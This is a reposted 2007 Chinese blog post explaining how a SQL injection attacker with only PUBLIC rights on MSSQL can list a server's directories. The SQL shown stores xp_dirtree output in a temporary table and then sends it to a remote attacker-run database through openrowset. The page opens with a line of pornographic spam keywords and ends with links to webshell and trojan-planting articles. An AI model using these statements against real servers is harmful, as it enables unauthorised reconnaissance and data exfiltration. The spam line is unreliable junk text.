欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法

 更新時間:2007年10月08日 22:50:16   作者:  
軟件作者:kj021320
信息來源:I.S.T.O技術(shù)團(tuán)隊(http://blog.csdn.net/I_S_T_O/)


本來這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個小部分,可惜寫了好久資料收集了好多但是估計年底都沒能出來~那就先發(fā)出來了!主要是MSSQL2005都來了!2K的話沒多久就會給淘汰了~拿出來跟大家交流吧~廣告說完了...

正文:

提起public權(quán)限的用戶估計很多人也覺得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長-_-!!!),里面說到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲過程,原因是public沒有辦法建表,我在這里矯正一下其實public是可以建表的~呵呵,使這些存儲過程能利用上,看下面的代碼吧

--建立一個臨時表,一般的表我們是無辦法建立的,我們只能建立臨時表

create table ##nonamed(

       dir ntext,

       num int

)

--調(diào)用存儲過程把執(zhí)行回來的數(shù)據(jù)存到臨時表里面

insert ##nonamed execute master..xp_dirtree 'c:\',1

--然后采用openrowset函數(shù)把臨時表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed

以上方法,也就是說public可以遍歷用戶服務(wù)器的目錄 具體有什么利用價值嘛~呵呵見仁見智了 


Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964

相關(guān)文章

  • 利用css實現(xiàn)掛馬的代碼

    利用css實現(xiàn)掛馬的代碼

    本站只是提供知識,方便大家以后的查殺木馬,不是用來搞破壞
    2008-01-01
  • 非常不錯的腳本入侵基礎(chǔ)知識總結(jié)

    非常不錯的腳本入侵基礎(chǔ)知識總結(jié)

    簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。
    2008-06-06
  • phpMyAdmin 后臺拿webshell

    phpMyAdmin 后臺拿webshell

    phpMyAdmin 后臺拿webshell...
    2007-03-03
  • 讓你變成ASP木馬高手

    讓你變成ASP木馬高手

    這篇文章主要介紹了讓你變成ASP木馬高手
    2007-01-01
  • 最新評論